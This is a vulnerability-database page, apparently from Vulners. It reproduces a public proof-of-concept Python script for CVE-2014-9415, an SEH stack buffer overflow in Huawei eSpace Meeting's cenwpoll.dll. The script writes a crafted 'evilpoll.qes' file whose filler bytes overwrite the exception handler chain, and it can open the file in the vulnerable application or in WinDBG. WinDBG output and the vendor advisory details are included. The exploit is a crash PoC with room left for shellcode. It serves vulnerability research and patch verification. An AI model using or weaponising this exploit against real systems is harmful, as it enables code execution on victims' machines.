Vulners
Lucene search
Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Huawei eSpace Meeting 1.1.11.103 - (cenwpoll.dll) SEH Buffer Overflow (Unicode) Exploit | 18 May 201900:00 | – | zdt |
 | Huawei eSpace Desktop V100R001C03 Denial of Service Vulnerability (CNVD-2015-00027) | 4 Jan 201500:00 | – | cnvd |
 | CVE-2014-9415 | 24 Dec 201418:00 | – | cve |
 | CVE-2014-9415 | 24 Dec 201418:00 | – | cvelist |
 | EUVD-2014-9236 | 7 Oct 202500:30 | – | euvd |
 | Huawei eSpace Meeting 1.1.11.103 - cenwpoll.dll SEH Buffer Overflow (Unicode) | 20 May 201900:00 | – | exploitpack |
 | Security Advisory-Multiple Vulnerabilities in Huawei eSpace Desktop Product | 17 Dec 201400:00 | – | huawei |
 | CVE-2014-9415 | 24 Dec 201418:59 | – | nvd |
 | Huawei eSpace 1.1.11.103 Unicode Stack Buffer Overflow | 17 May 201900:00 | – | packetstorm |
 | Design/Logic Flaw | 24 Dec 201418:59 | – | prion |
10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite
#
#
# Vendor: Huawei Technologies Co., Ltd.
# Product web page: https://www.huawei.com
# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290
# Affected module: cenwpoll.dll 1.0.8.8
# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe
#
# Product description:
# --------------------
# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of
# products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides
# users with easy and secure access to their service platform from any device, in any place, at any time.
# 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using
# the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed.
#
# Vulnerability description:
# --------------------------
# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails
# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when
# handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of
# the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
#
# Tested on:
# ----------
# OS Name: Microsoft Windows 7 Professional
# OS Version: 6.1.7601 Service Pack 1 Build 7601
# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz
#
# Vulnerability discovered by:
# ----------------------------
# Gjoko 'LiquidWorm' Krstic
# Senior STTE
# SCD-ERC
# Munich, Germany
# 26th of August (Tuesday), 2014
#
# PSIRT details:
# --------------
# Security advisory No.: Huawei-SA-20141217- espace
# Initial release date: Dec 17, 2014
# Vulnerability ID: HWPSIRT-2014-1151
# CVE ID: CVE-2014-9415
# Patched version: eSpace Meeting V100R001C03
# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589
#
#
# ------------------------------------ WinDBG output ------------------------------------
#
# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045
# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll -
# cenwpoll!DllUnregisterServer+0xa59e:
# 05790f3e 8178082c010000 cmp dword ptr [eax+8],12Ch ds:0023:00000008=????????
# 0:008> !exchain
# 02feccf4: *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe
# mcstub+10041 (00410041)
# Invalid exception stack at 00410041
# Instruction Address: 0x0000000005790f3e
#
# Description: Exception Handler Chain Corrupted
# Short Description: ExceptionHandlerCorrupted
# Exploitability Classification: EXPLOITABLE
# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b)
#
# Corruption of the exception handler chain is considered exploitable
#
# 0:008> d ebp
# 02fecd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 02fecd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 02fecd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 02fecd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 02fecd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 02fecd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 02fecd60 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 02fecd70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 0:008> u ebp
# 02fecd00 41 inc ecx
# 02fecd01 004100 add byte ptr [ecx],al
# 02fecd04 41 inc ecx
# 02fecd05 004100 add byte ptr [ecx],al
# 02fecd08 41 inc ecx
# 02fecd09 004100 add byte ptr [ecx],al
# 02fecd0c 41 inc ecx
# 02fecd0d 004100 add byte ptr [ecx],al
#
# ------------------------------------ /WinDBG output ------------------------------------
#
#
import sys, os, time
os.system('title jterm')
os.system('color f5')
os.system('cls')
piton = os.path.basename(sys.argv[0])
def usage():
print '''
+---------------------------------------------+
| eSpace Meeting Stack Buffer Overflow Vuln |
| |
| Vuln ID: HWPSIRT-2014-1151 |
| CVE ID: CVE-2014-9415 |
+---------------------------------------------+
'''
if len(sys.argv) < 2:
print 'Usage: \n\n\t'+piton+' <OPTION>'
print '\nOPTION:\n'
print '\t0 - Create the evil PoC file.'
print '\t1 - Create the evil file, start the vulnerable application and crash it.'
print '\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\n'
quit()
usage()
crash = sys.argv[1]
dir = os.getcwd();
file = "evilpoll.qes"
header = '\x56\x34\x78\x12\x01\x00\x09\x00' # V4x.....
time.sleep(1)
# Overwrite FS:[0] chain (\x43 = EIP)
buffer = '\x41' * 353 +'\x42' * 2 +'\x43' * 2 +'\x44' * 42 +'New Poll' # \x44 can be incremented (byte space for venetian shellcode)
buffer += '\x00\x01\x00\x00\x00\x00\x00\x90'
buffer += '\x85\xA9\xD7\x00\x01\x04\x00'
buffer += 'TEST'+'\x01\x02\x05\x00'
buffer += 'ANSW1'+'\x05\x00'
buffer += 'ANSW2'
poc = header + buffer
bytes = len(poc)
print '[+] Creating evil PoC file...'
time.sleep(1)
print '[+] Buffering:\n'
time.sleep(1)
index = 0
while index < len(poc):
char = poc[index]
#print char,
sys.stdout.write(char)
time.sleep(10.0 / 1000.0)
index = index + 1
try:
writeFile = open (file, 'w')
writeFile.write( poc )
writeFile.close()
time.sleep(1)
print '\n\n[+] File \"'+file+'\" successfully created!'
time.sleep(1)
print '[+] Location: "'+dir+'"'
print '[+] Wrote '+str(bytes)+' bytes.'
except:
print '[-] Error while creating file!\n'
if crash == '0':
print '\n\n[+] Done!\n'
elif crash == '1':
print '[+] The script will now execute the vulnerable application with the PoC file as its argument.\n'
os.system('pause')
os.system('C:\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe "%~dp0evilpoll.qes"')
elif crash == '2':
print '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\n'
os.system('pause')
os.system('C:\\Progra~1\\Debugg~1\\windbg.exe -Q -g -c "!exchain" -o "C:\\Progra~1\eSpace-ecs\conf\cwbin\classreader.exe" "%~dp0evilpoll.qes"')
print '\n[+] You should see something like this in WinDBG:'
print '''
0:000> d 0012e37c
0012e37c 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.
0012e38c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0012e39c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0012e3ac 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0012e3bc 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0012e3cc 44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00 D.D.D.D.D.D.N.e.
0012e3dc 77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00 w. .P.o.l.l.....
0012e3ec c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00 ....V4x.p.......
0:000> !exchain
0012e37c: 00430043
Invalid exception stack at 00420042
'''
else:
print '[+] Have a nice day! ^^\n'
quit()
print '\n[+] Have a nice day! ^^\n'
#os.system('color 07')Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 May 2019 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 21.9
EPSS0.00106